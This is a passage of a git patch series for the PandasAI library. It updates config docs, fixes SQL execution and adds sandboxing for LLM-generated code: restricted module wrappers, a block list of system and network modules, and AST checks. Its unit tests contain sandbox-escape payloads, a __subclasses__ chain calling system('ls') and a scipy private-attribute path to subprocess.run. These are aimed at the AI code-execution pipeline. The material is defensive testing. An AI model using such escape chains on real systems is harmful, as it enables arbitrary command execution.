+or by specifying it in the `pandasai.json` configuration file.
If the model expects one or more parameters, you can pass them to the constructor or specify them in the `pandasai.json`
-file, in the `llm_options` param, as it follows:
+file, in the `llm_options` parameter. Here’s an example of how to structure your `pandasai.json` file:
```json
{
@@ -21,6 +21,24 @@ file, in the `llm_options` param, as it follows:
}
}
```
+> **Note:**
+> `pandasai.json` can be configured for any LLM.
+
+## Working with pandasai.json file
+
+In this example, `data.csv` is your data file, and `pandasai.json` is the configuration file. Make sure the configuration file is named `pandasai.json` and is in the same folder as your code.
+
+```python
+from pandasai import SmartDataframe
+from pandasai.config import load_config_from_json
+
+# Load configuration from pandasai.json
+config = load_config_from_json()
+
+df = SmartDataframe("data.csv", config=config)
+response = df.chat("give me revenue of Top 5 companies for year 2021")
+print(response)
+```
## BambooLLM
From 437f9498df042fabd448d3c03b0cb63a8d58a870 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Mon, 18 Nov 2024 14:35:19 +0100
Subject: [PATCH 07/58] fix[output_format]: accept dataframe dict as output and secure sql qu… (#1432)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* fix[output_format]: accept dataframe dict as output and secure sql query execution
* fix: ruff errors
---
pandasai/connectors/sql.py | 2 +-
pandasai/helpers/output_validator.py | 4 ++--
pandasai/responses/response_parser.py | 12 ++++++++++++
3 files changed, 15 insertions(+), 3 deletions(-)
diff --git a/pandasai/connectors/sql.py b/pandasai/connectors/sql.py
index e1494ba59..68638e8a2 100644
--- a/pandasai/connectors/sql.py
+++ b/pandasai/connectors/sql.py
@@ -441,7 +441,7 @@ def execute_direct_sql_query(self, sql_query):
if not self._is_sql_query_safe(sql_query):
raise MaliciousQueryError("Malicious query is generated in code")
- return pd.read_sql(sql_query, self._connection)
+ return pd.read_sql(text(sql_query), self._connection)
@property
def cs_table_name(self):
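
Wrapping the query in `sqlalchemy.text()` hands `read_sql` an executable `TextClause` instead of a bare string, which SQLAlchemy 2.x connections expect. A self-contained sketch of the pattern (the in-memory SQLite database and table are illustrative):

```python
import pandas as pd
from sqlalchemy import create_engine, text

engine = create_engine("sqlite://")  # in-memory database for the demo
with engine.connect() as conn:
    conn.execute(text("CREATE TABLE users (id INTEGER, name TEXT)"))
    conn.execute(text("INSERT INTO users VALUES (1, 'Ada'), (2, 'Alan')"))
    # Same shape as the fix: pd.read_sql(text(sql_query), connection)
    df = pd.read_sql(text("SELECT * FROM users"), conn)

print(df)
```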
diff --git a/pandasai/helpers/output_validator.py b/pandasai/helpers/output_validator.py
index e26bcf2ff..56a3a495d 100644
--- a/pandasai/helpers/output_validator.py
+++ b/pandasai/helpers/output_validator.py
@@ -56,7 +56,7 @@ def validate_value(self, expected_type: str) -> bool:
elif expected_type == "string":
return isinstance(self, str)
elif expected_type == "dataframe":
- return isinstance(self, (pd.DataFrame, pd.Series))
+ return isinstance(self, (pd.DataFrame, pd.Series, dict))
elif expected_type == "plot":
if not isinstance(self, (str, dict)):
return False
@@ -82,7 +82,7 @@ def validate_result(result: dict) -> bool:
elif result["type"] == "string":
return isinstance(result["value"], str)
elif result["type"] == "dataframe":
- return isinstance(result["value"], (pd.DataFrame, pd.Series))
+ return isinstance(result["value"], (pd.DataFrame, pd.Series, dict))
elif result["type"] == "plot":
if "plotly" in repr(type(result["value"])):
return True
diff --git a/pandasai/responses/response_parser.py b/pandasai/responses/response_parser.py
index fd202784d..4254c77ec 100644
--- a/pandasai/responses/response_parser.py
+++ b/pandasai/responses/response_parser.py
@@ -1,6 +1,7 @@
from abc import ABC, abstractmethod
from typing import Any
+import pandas as pd
from PIL import Image
from pandasai.exceptions import MethodNotImplementedError
@@ -51,9 +52,20 @@ def parse(self, result: dict) -> Any:
if result["type"] == "plot":
return self.format_plot(result)
+ elif result["type"] == "dataframe":
+ return self.format_dataframe(result)
else:
return result["value"]
+ def format_dataframe(self, result: dict) -> Any:
+ if isinstance(result["value"], dict):
+            # Convert a dict payload into a proper DataFrame
+            df = pd.DataFrame(result["value"])
+            result["value"] = df
+
+ return result["value"]
+
def format_plot(self, result: dict) -> Any:
"""
Display matplotlib plot against a user query.
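
With the validator now accepting dicts for the `dataframe` output type, the parser converts them before returning. A condensed sketch of that conversion path (the payload values are made up):

```python
import pandas as pd

# Example result payload produced by generated code
result = {"type": "dataframe", "value": {"country": ["US", "DE"], "gdp": [25.4, 4.1]}}

# Mirrors format_dataframe above: dict values become a DataFrame
if isinstance(result["value"], dict):
    result["value"] = pd.DataFrame(result["value"])

print(result["value"])
```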
From 27cb449572d05597a10dbdd691fe3acf7a6945a8 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Wed, 20 Nov 2024 11:29:13 +0100
Subject: [PATCH 08/58] chore[Security]: restrict libs to allow specific
functionalities (#1429)
* chore[Security]: restrict libs to allow specific functionalities
* remove: extra lib handling
* fix: ruff errors
* fix: error message for bad import
* fix: add io library in the blacklist
---
pandasai/constants.py | 32 ++-
pandasai/helpers/optional.py | 34 +++-
pandasai/pipelines/chat/code_cleaning.py | 63 +++++-
pandasai/safe_libs/base_restricted_module.py | 27 +++
pandasai/safe_libs/restricted_base64.py | 21 ++
pandasai/safe_libs/restricted_datetime.py | 64 ++++++
pandasai/safe_libs/restricted_json.py | 23 +++
pandasai/safe_libs/restricted_matplotlib.py | 76 ++++++++
pandasai/safe_libs/restricted_numpy.py | 182 ++++++++++++++++++
pandasai/safe_libs/restricted_pandas.py | 110 +++++++++++
pandasai/safe_libs/restricted_seaborn.py | 74 +++++++
.../smart_datalake/test_code_cleaning.py | 60 ++++--
12 files changed, 731 insertions(+), 35 deletions(-)
create mode 100644 pandasai/safe_libs/base_restricted_module.py
create mode 100644 pandasai/safe_libs/restricted_base64.py
create mode 100644 pandasai/safe_libs/restricted_datetime.py
create mode 100644 pandasai/safe_libs/restricted_json.py
create mode 100644 pandasai/safe_libs/restricted_matplotlib.py
create mode 100644 pandasai/safe_libs/restricted_numpy.py
create mode 100644 pandasai/safe_libs/restricted_pandas.py
create mode 100644 pandasai/safe_libs/restricted_seaborn.py
diff --git a/pandasai/constants.py b/pandasai/constants.py
index bf0734547..43dccbd4e 100644
--- a/pandasai/constants.py
+++ b/pandasai/constants.py
@@ -85,21 +85,35 @@
# List of Python packages that are whitelisted for import in generated code
WHITELISTED_LIBRARIES = [
- "sklearn",
- "statsmodels",
"seaborn",
- "plotly",
- "ggplot",
"matplotlib",
"numpy",
"datetime",
"json",
- "io",
"base64",
- "scipy",
- "streamlit",
- "modin",
- "scikit-learn",
+ "pandas",
+]
+
+# List of restricted libs
+RESTRICTED_LIBS = [
+ "os", # OS-level operations (file handling, environment variables)
+ "sys", # System-level access
+ "subprocess", # Run system commands
+ "shutil", # File operations, including delete
+ "multiprocessing", # Spawn new processes
+ "threading", # Thread-level operations
+ "socket", # Network connections
+ "http", # HTTP requests
+ "ftplib", # FTP connections
+ "paramiko", # SSH operations
+ "tempfile", # Create temporary files
+ "pathlib", # Filesystem path handling
+ "resource", # Access resource usage limits (system-related)
+ "ssl", # SSL socket connections
+ "pickle", # Unsafe object serialization
+ "ctypes", # C-level interaction with memory
+ "psutil", # System and process utilities
+ "io",
]
PANDASBI_SETUP_MESSAGE = (
diff --git a/pandasai/helpers/optional.py b/pandasai/helpers/optional.py
index 37ccd87ee..f1d7a830a 100644
--- a/pandasai/helpers/optional.py
+++ b/pandasai/helpers/optional.py
@@ -10,12 +10,16 @@
import warnings
from typing import TYPE_CHECKING, List
-import matplotlib.pyplot as plt
-import numpy as np
from pandas.util.version import Version
-import pandasai.pandas as pd
from pandasai.constants import WHITELISTED_BUILTINS
+from pandasai.safe_libs.restricted_base64 import RestrictedBase64
+from pandasai.safe_libs.restricted_datetime import RestrictedDatetime
+from pandasai.safe_libs.restricted_json import RestrictedJson
+from pandasai.safe_libs.restricted_matplotlib import RestrictedMatplotlib
+from pandasai.safe_libs.restricted_numpy import RestrictedNumpy
+from pandasai.safe_libs.restricted_pandas import RestrictedPandas
+from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
if TYPE_CHECKING:
import types
@@ -54,10 +58,7 @@ def get_environment(additional_deps: List[dict]) -> dict:
Returns (dict): A dictionary of environment variables
"""
- return {
- "pd": pd,
- "plt": plt,
- "np": np,
+ env = {
**{
lib["alias"]: (
getattr(import_dependency(lib["module"]), lib["name"])
@@ -73,6 +74,25 @@ def get_environment(additional_deps: List[dict]) -> dict:
},
}
+ env["pd"] = RestrictedPandas()
+ env["plt"] = RestrictedMatplotlib()
+ env["np"] = RestrictedNumpy()
+
+ for lib in additional_deps:
+ if lib["name"] == "seaborn":
+ env["sns"] = RestrictedSeaborn()
+
+ if lib["name"] == "datetime":
+ env["datetime"] = RestrictedDatetime()
+
+ if lib["name"] == "json":
+ env["json"] = RestrictedJson()
+
+ if lib["name"] == "base64":
+ env["base64"] = RestrictedBase64()
+
+ return env
+
def import_dependency(
name: str,
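
The wrappers substituted into the execution environment expose only whitelisted attributes. A quick behavioral sketch, assuming the `pandasai.safe_libs` package layout introduced by this patch:

```python
from pandasai.safe_libs.restricted_pandas import RestrictedPandas

pd = RestrictedPandas()
df = pd.DataFrame({"a": [1, 2, 3]})  # "DataFrame" is whitelisted; the call is wrapped
print(df.sum())

try:
    pd.read_csv  # not in allowed_attributes
except AttributeError as exc:
    print(exc)   # 'read_csv' is not allowed in RestrictedPandas
```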
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
index 3effcaed0..5e86975df 100644
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ b/pandasai/pipelines/chat/code_cleaning.py
@@ -15,7 +15,7 @@
from ...connectors import BaseConnector
from ...connectors.sql import SQLConnector
-from ...constants import WHITELISTED_BUILTINS, WHITELISTED_LIBRARIES
+from ...constants import RESTRICTED_LIBS, WHITELISTED_LIBRARIES
from ...exceptions import (
BadImportError,
ExecuteSQLQueryNotUsed,
@@ -161,6 +161,58 @@ def get_code_to_run(self, code: str, context: CodeExecutionContext) -> Any:
return code_to_run
def _is_malicious_code(self, code) -> bool:
+ tree = ast.parse(code)
+
+ # Check for private attributes and access of restricted libs
+ def check_restricted_access(node):
+ """Check if the node accesses restricted modules or private attributes."""
+ if isinstance(node, ast.Attribute):
+ attr_chain = []
+ while isinstance(node, ast.Attribute):
+ if node.attr.startswith("_"):
+ raise MaliciousQueryError(
+ f"Access to private attribute '{node.attr}' is not allowed."
+ )
+ attr_chain.insert(0, node.attr)
+ node = node.value
+ if isinstance(node, ast.Name):
+ attr_chain.insert(0, node.id)
+ if any(module in RESTRICTED_LIBS for module in attr_chain):
+ raise MaliciousQueryError(
+ f"Restricted access detected in attribute chain: {'.'.join(attr_chain)}"
+ )
+
+ elif isinstance(node, ast.Subscript) and isinstance(
+ node.value, ast.Attribute
+ ):
+ check_restricted_access(node.value)
+
+ for node in ast.walk(tree):
+ # Check 'import ...' statements
+ if isinstance(node, ast.Import):
+ for alias in node.names:
+ sub_module_names = alias.name.split(".")
+ if any(module in RESTRICTED_LIBS for module in sub_module_names):
+ raise MaliciousQueryError(
+ f"Restricted library import detected: {alias.name}"
+ )
+
+ # Check 'from ... import ...' statements
+ elif isinstance(node, ast.ImportFrom):
+ sub_module_names = node.module.split(".")
+ if any(module in RESTRICTED_LIBS for module in sub_module_names):
+ raise MaliciousQueryError(
+ f"Restricted library import detected: {node.module}"
+ )
+ if any(alias.name in RESTRICTED_LIBS for alias in node.names):
+ raise MaliciousQueryError(
+ "Restricted library import detected in 'from ... import ...'"
+ )
+
+ # Check attribute access for restricted libraries
+ elif isinstance(node, (ast.Attribute, ast.Subscript)):
+ check_restricted_access(node)
+
dangerous_modules = [
" os",
" io",
@@ -176,6 +228,7 @@ def _is_malicious_code(self, code) -> bool:
"(chr",
"b64decode",
]
+
return any(
re.search(r"\b" + re.escape(module) + r"\b", code)
for module in dangerous_modules
@@ -584,5 +637,9 @@ def _check_imports(self, node: Union[ast.Import, ast.ImportFrom]):
)
return
- if library not in WHITELISTED_BUILTINS:
- raise BadImportError(library)
+ if library not in WHITELISTED_LIBRARIES:
+ raise BadImportError(
+ f"The library '{library}' is not in the list of whitelisted libraries. "
+ "To learn how to whitelist custom dependencies, visit: "
+ "https://docs.pandas-ai.com/custom-whitelisted-dependencies#custom-whitelisted-dependencies"
+ )
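
A condensed, standalone sketch of the import screening above (the `RESTRICTED_LIBS` list is abbreviated here; the full list lives in `pandasai/constants.py`, and the real check also walks attribute chains and private attributes):

```python
import ast

RESTRICTED_LIBS = ["os", "sys", "subprocess"]  # abbreviated

def has_restricted_import(code: str) -> bool:
    """Flag 'import x' and 'from x import y' statements touching restricted modules."""
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if any(part in RESTRICTED_LIBS for part in alias.name.split(".")):
                    return True
        elif isinstance(node, ast.ImportFrom):
            if any(part in RESTRICTED_LIBS for part in (node.module or "").split(".")):
                return True
            if any(alias.name in RESTRICTED_LIBS for alias in node.names):
                return True
    return False

print(has_restricted_import("import os"))                 # True
print(has_restricted_import("from datetime import sys"))  # True
print(has_restricted_import("import pandas as pd"))       # False
```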
diff --git a/pandasai/safe_libs/base_restricted_module.py b/pandasai/safe_libs/base_restricted_module.py
new file mode 100644
index 000000000..3067a3aab
--- /dev/null
+++ b/pandasai/safe_libs/base_restricted_module.py
@@ -0,0 +1,27 @@
+class BaseRestrictedModule:
+ def _wrap_function(self, func):
+ def wrapper(*args, **kwargs):
+ # Check for any suspicious arguments that might be used for importing
+ for arg in args + tuple(kwargs.values()):
+ if isinstance(arg, str) and any(
+ module in arg.lower()
+ for module in ["io", "os", "subprocess", "sys", "importlib"]
+ ):
+ raise SecurityError(
+ f"Potential security risk: '{arg}' is not allowed"
+ )
+ return func(*args, **kwargs)
+
+ return wrapper
+
+    def _wrap_class(self, cls):
+        outer = self  # capture the restricted module; WrappedClass has no _wrap_function
+
+        class WrappedClass(cls):
+            def __getattribute__(self, name):
+                attr = super().__getattribute__(name)
+                return outer._wrap_function(attr) if callable(attr) else attr
+
+        return WrappedClass
+
+
+class SecurityError(Exception):
+ pass
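
A tiny demonstration of the argument screening in `_wrap_function`, assuming the module is importable under the layout shown above:

```python
from pandasai.safe_libs.base_restricted_module import (
    BaseRestrictedModule,
    SecurityError,
)

class Echo(BaseRestrictedModule):
    def __init__(self):
        self.echo = self._wrap_function(lambda s: s)

e = Echo()
print(e.echo("hello"))   # harmless string passes through
try:
    e.echo("import os")  # mentions a blocked module name
except SecurityError as exc:
    print(exc)           # Potential security risk: 'import os' is not allowed
```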
diff --git a/pandasai/safe_libs/restricted_base64.py b/pandasai/safe_libs/restricted_base64.py
new file mode 100644
index 000000000..eb305885e
--- /dev/null
+++ b/pandasai/safe_libs/restricted_base64.py
@@ -0,0 +1,21 @@
+import base64
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedBase64(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_functions = [
+ "b64encode", # Safe function to encode data into base64
+ "b64decode", # Safe function to decode base64 encoded data
+ ]
+
+ # Bind the allowed functions to the object
+ for func in self.allowed_functions:
+ if hasattr(base64, func):
+ setattr(self, func, self._wrap_function(getattr(base64, func)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_functions:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedBase64")
+ return getattr(base64, name)
diff --git a/pandasai/safe_libs/restricted_datetime.py b/pandasai/safe_libs/restricted_datetime.py
new file mode 100644
index 000000000..0fc48290a
--- /dev/null
+++ b/pandasai/safe_libs/restricted_datetime.py
@@ -0,0 +1,64 @@
+import datetime
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedDatetime(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # Classes
+ "date",
+ "time",
+ "datetime",
+ "timedelta",
+ "tzinfo",
+ "timezone",
+ # Constants
+ "MINYEAR",
+ "MAXYEAR",
+ # Time zone constants
+ "UTC",
+ # Functions
+ "now",
+ "utcnow",
+ "today",
+ "fromtimestamp",
+ "utcfromtimestamp",
+ "fromordinal",
+ "combine",
+ "strptime",
+ # Timedelta operations
+ "timedelta",
+ # Date operations
+ "weekday",
+ "isoweekday",
+ "isocalendar",
+ "isoformat",
+ "ctime",
+ "strftime",
+ "year",
+ "month",
+ "day",
+ "hour",
+ "minute",
+ "second",
+ "microsecond",
+ # Time operations
+ "replace",
+ "tzname",
+ "dst",
+ "utcoffset",
+ # Comparison methods
+ "min",
+ "max",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(datetime, attr):
+ setattr(self, attr, self._wrap_function(getattr(datetime, attr)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedDatetime")
+
+ return getattr(datetime, name)
diff --git a/pandasai/safe_libs/restricted_json.py b/pandasai/safe_libs/restricted_json.py
new file mode 100644
index 000000000..7f13b6112
--- /dev/null
+++ b/pandasai/safe_libs/restricted_json.py
@@ -0,0 +1,23 @@
+import json
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedJson(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_functions = [
+ "load",
+ "loads",
+ "dump",
+ "dumps",
+ ]
+
+ # Bind the allowed functions to the object
+ for func in self.allowed_functions:
+ if hasattr(json, func):
+ setattr(self, func, self._wrap_function(getattr(json, func)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_functions:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedJson")
+ return getattr(json, name)
diff --git a/pandasai/safe_libs/restricted_matplotlib.py b/pandasai/safe_libs/restricted_matplotlib.py
new file mode 100644
index 000000000..82635bfda
--- /dev/null
+++ b/pandasai/safe_libs/restricted_matplotlib.py
@@ -0,0 +1,76 @@
+import matplotlib.axes as axes
+import matplotlib.figure as figure
+import matplotlib.pyplot as plt
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedMatplotlib(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # Figure and Axes creation
+ "figure",
+ "subplots",
+ "subplot",
+ # Plotting functions
+ "plot",
+ "scatter",
+ "bar",
+ "barh",
+ "hist",
+ "boxplot",
+ "violinplot",
+ "pie",
+ "errorbar",
+ "contour",
+ "contourf",
+ "imshow",
+ "pcolor",
+ "pcolormesh",
+ # Axis manipulation
+ "xlabel",
+ "ylabel",
+ "title",
+ "legend",
+ "xlim",
+ "ylim",
+ "axis",
+ "xticks",
+ "yticks",
+ "grid",
+ "axhline",
+ "axvline",
+ # Colorbar
+ "colorbar",
+ # Text and annotations
+ "text",
+ "annotate",
+ # Styling
+ "style",
+ # Save and show
+ "show",
+ "savefig",
+ # Color maps
+ "get_cmap",
+ # 3D plotting
+ "axes3d",
+ # Utility functions
+ "close",
+ "clf",
+ "cla",
+ # Constants
+ "rcParams",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(plt, attr):
+ setattr(self, attr, self._wrap_function(getattr(plt, attr)))
+
+ # Special handling for figure and axes
+ self.Figure = self._wrap_class(figure.Figure)
+ self.Axes = self._wrap_class(axes.Axes)
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedMatplotlib")
+ return getattr(plt, name)
diff --git a/pandasai/safe_libs/restricted_numpy.py b/pandasai/safe_libs/restricted_numpy.py
new file mode 100644
index 000000000..855fb70d6
--- /dev/null
+++ b/pandasai/safe_libs/restricted_numpy.py
@@ -0,0 +1,182 @@
+import numpy as np
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedNumpy(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # Array creation
+ "array",
+ "zeros",
+ "ones",
+ "empty",
+ "full",
+ "zeros_like",
+ "ones_like",
+ "empty_like",
+ "full_like",
+ "eye",
+ "identity",
+ "diag",
+ "arange",
+ "linspace",
+ "logspace",
+ "geomspace",
+ "fromfunction",
+ "fromiter",
+ # Array manipulation
+ "reshape",
+ "ravel",
+ "flatten",
+ "moveaxis",
+ "rollaxis",
+ "swapaxes",
+ "transpose",
+ "split",
+ "hsplit",
+ "vsplit",
+ "dsplit",
+ "stack",
+ "column_stack",
+ "dstack",
+ "row_stack",
+ "concatenate",
+ "vstack",
+ "hstack",
+ "tile",
+ "repeat",
+ # Mathematical operations
+ "add",
+ "subtract",
+ "multiply",
+ "divide",
+ "power",
+ "mod",
+ "remainder",
+ "divmod",
+ "negative",
+ "positive",
+ "absolute",
+ "fabs",
+ "rint",
+ "floor",
+ "ceil",
+ "trunc",
+ "exp",
+ "expm1",
+ "exp2",
+ "log",
+ "log10",
+ "log2",
+ "log1p",
+ "sqrt",
+ "square",
+ "cbrt",
+ "reciprocal",
+ # Trigonometric functions
+ "sin",
+ "cos",
+ "tan",
+ "arcsin",
+ "arccos",
+ "arctan",
+ "arctan2",
+ "hypot",
+ "sinh",
+ "cosh",
+ "tanh",
+ "arcsinh",
+ "arccosh",
+ "arctanh",
+ "deg2rad",
+ "rad2deg",
+ # Statistical functions
+ "mean",
+ "average",
+ "median",
+ "std",
+ "var",
+ "min",
+ "max",
+ "argmin",
+ "argmax",
+ "sum",
+ "prod",
+ "percentile",
+ "quantile",
+ "histogram",
+ "histogram2d",
+ "histogramdd",
+ "bincount",
+ "digitize",
+ # Linear algebra
+ "dot",
+ "vdot",
+ "inner",
+ "outer",
+ "matmul",
+ "tensordot",
+ "einsum",
+ "trace",
+ "diagonal",
+ # Sorting and searching
+ "sort",
+ "argsort",
+ "partition",
+ "argpartition",
+ "searchsorted",
+ "nonzero",
+ "where",
+ "extract",
+ # Logic functions
+ "all",
+ "any",
+ "greater",
+ "greater_equal",
+ "less",
+ "less_equal",
+ "equal",
+ "not_equal",
+ "logical_and",
+ "logical_or",
+ "logical_not",
+ "logical_xor",
+ "isfinite",
+ "isinf",
+ "isnan",
+ "isneginf",
+ "isposinf",
+ # Set operations
+ "unique",
+ "intersect1d",
+ "union1d",
+ "setdiff1d",
+ "setxor1d",
+ # Basic array information
+ "shape",
+ "size",
+ "ndim",
+ "dtype",
+ # Utility functions
+ "clip",
+ "round",
+ "sign",
+ "conj",
+ "real",
+ "imag",
+ "copy",
+ "asarray",
+ "asanyarray",
+ "ascontiguousarray",
+ "asfortranarray",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(np, attr):
+ setattr(self, attr, self._wrap_function(getattr(np, attr)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedNumPy")
+ return getattr(np, name)
diff --git a/pandasai/safe_libs/restricted_pandas.py b/pandasai/safe_libs/restricted_pandas.py
new file mode 100644
index 000000000..75e5a083c
--- /dev/null
+++ b/pandasai/safe_libs/restricted_pandas.py
@@ -0,0 +1,110 @@
+import pandas as pd
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedPandas(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # DataFrame creation and basic operations
+ "DataFrame",
+ "Series",
+ "concat",
+ "merge",
+ "join",
+ # Data manipulation
+ "groupby",
+ "pivot",
+ "pivot_table",
+ "melt",
+ "crosstab",
+ "cut",
+ "qcut",
+ "get_dummies",
+ "factorize",
+ # Indexing and selection
+ "loc",
+ "iloc",
+ "at",
+ "iat",
+ # Function application
+ "apply",
+ "applymap",
+ "pipe",
+ # Reshaping and sorting
+ "sort_values",
+ "sort_index",
+ "nlargest",
+ "nsmallest",
+ "rank",
+ "reindex",
+ "reset_index",
+ "set_index",
+ # Computations / descriptive stats
+ "sum",
+ "prod",
+ "min",
+ "max",
+ "mean",
+ "median",
+ "var",
+ "std",
+ "sem",
+ "skew",
+ "kurt",
+ "quantile",
+ "count",
+ "nunique",
+ "value_counts",
+ "describe",
+ "cov",
+ "corr",
+ # Date functionality
+ "to_datetime",
+ "date_range",
+ # String methods
+ "str",
+ # Categorical methods
+ "Categorical",
+ "cut",
+ "qcut",
+ # Plotting (if visualization is allowed)
+ "plot",
+ # Utility functions
+ "isnull",
+ "notnull",
+ "isna",
+ "notna",
+ "fillna",
+ "dropna",
+ "replace",
+ "astype",
+ "copy",
+ "drop_duplicates",
+ # Window functions
+ "rolling",
+ "expanding",
+ "ewm",
+ # Time series functionality
+ "resample",
+ "shift",
+ "diff",
+ "pct_change",
+ # Aggregation
+ "agg",
+ "aggregate",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(pd, attr):
+ setattr(self, attr, self._wrap_function(getattr(pd, attr)))
+ elif attr in ["loc", "iloc", "at", "iat"]:
+ # These are properties, not functions
+ setattr(
+ self, attr, property(lambda self, a=attr: getattr(pd.DataFrame, a))
+ )
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedPandas")
+ return getattr(pd, name)
diff --git a/pandasai/safe_libs/restricted_seaborn.py b/pandasai/safe_libs/restricted_seaborn.py
new file mode 100644
index 000000000..a5ef4c6e8
--- /dev/null
+++ b/pandasai/safe_libs/restricted_seaborn.py
@@ -0,0 +1,74 @@
+import seaborn as sns
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedSeaborn(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # Plot functions
+ "scatterplot",
+ "lineplot",
+ "relplot",
+ "displot",
+ "histplot",
+ "kdeplot",
+ "ecdfplot",
+ "rugplot",
+ "distplot",
+ "boxplot",
+ "violinplot",
+ "boxenplot",
+ "stripplot",
+ "swarmplot",
+ "barplot",
+ "countplot",
+ "heatmap",
+ "clustermap",
+ "regplot",
+ "lmplot",
+ "residplot",
+ "jointplot",
+ "pairplot",
+ "catplot",
+ # Axis styling
+ "set_style",
+ "set_context",
+ "set_palette",
+ "despine",
+ "move_legend",
+ "axes_style",
+ "plotting_context",
+ # Color palette functions
+ "color_palette",
+ "palplot",
+ "cubehelix_palette",
+ "light_palette",
+ "dark_palette",
+ "diverging_palette",
+ # Utility functions
+ "load_dataset",
+ # Figure-level interface
+ "FacetGrid",
+ "PairGrid",
+ "JointGrid",
+ # Regression and statistical estimation
+ "lmplot",
+ "regplot",
+ "residplot",
+ # Matrix plots
+ "heatmap",
+ "clustermap",
+ # Miscellaneous
+ "kdeplot",
+ "rugplot",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(sns, attr):
+ setattr(self, attr, self._wrap_function(getattr(sns, attr)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedSeaborn")
+ return getattr(sns, name)
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
index 8ccad9efd..49169f373 100644
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
@@ -188,23 +188,17 @@ def test_run_code_invalid_code(
with pytest.raises(Exception):
code_cleaning.execute("1 +", context=context, logger=logger)
- def test_clean_code_remove_builtins(
+ def test_clean_code_raise_not_whitelisted_lib(
self,
code_cleaning: CodeCleaning,
context: PipelineContext,
logger: Logger,
):
- builtins_code = """import set
+ builtins_code = """import scipy
result = {'type': 'number', 'value': set([1, 2, 3])}"""
- output = code_cleaning.execute(builtins_code, context=context, logger=logger)
-
- assert (
- output.output == """result = {'type': 'number', 'value': set([1, 2, 3])}"""
- )
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
+ with pytest.raises(BadImportError):
+ code_cleaning.execute(builtins_code, context=context, logger=logger)
def test_clean_code_removes_jailbreak_code(
self,
@@ -215,12 +209,8 @@ def test_clean_code_removes_jailbreak_code(
malicious_code = """__builtins__['str'].__class__.__mro__[-1].__subclasses__()[140].__init__.__globals__['system']('ls')
print('hello world')"""
- output = code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- assert output.output == """print('hello world')"""
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
+ with pytest.raises(MaliciousQueryError):
+ code_cleaning.execute(malicious_code, context=context, logger=logger)
def test_clean_code_remove_environment_defaults(
self,
@@ -900,3 +890,41 @@ def cs_table_name(self):
node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
assert node.value.args[0].value == 'SELECT COUNT(*) AS user_count FROM "Users"'
+
+ def test_clean_code_raise_private_variable_access_error(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ malicious_code = """
+import scipy
+result = {"type": "string", "value": f"{scipy.sparse._sputils.sys.modules['subprocess'].run(['cmd', '/c', 'dir'], text=True, capture_output=True).stdout}"}
+print(result)
+"""
+ with pytest.raises(MaliciousQueryError):
+ code_cleaning.execute(malicious_code, context=context, logger=logger)
+
+ def test_clean_code_raise_import_with_restricted_modules(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ malicious_code = """
+from datetime import sys
+"""
+ with pytest.raises(MaliciousQueryError):
+ code_cleaning.execute(malicious_code, context=context, logger=logger)
+
+ def test_clean_code_raise_import_with_restricted_using_import_statement(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ malicious_code = """
+import datetime.sys as spy
+"""
+ with pytest.raises(MaliciousQueryError):
+ code_cleaning.execute(malicious_code, context=context, logger=logger)
From 0e4e1d0e880621345e06195f195b634670089f6b Mon Sep 17 00:00:00 2001
From: Gabriele Venturi
Date: Wed, 20 Nov 2024 11:41:04 +0100
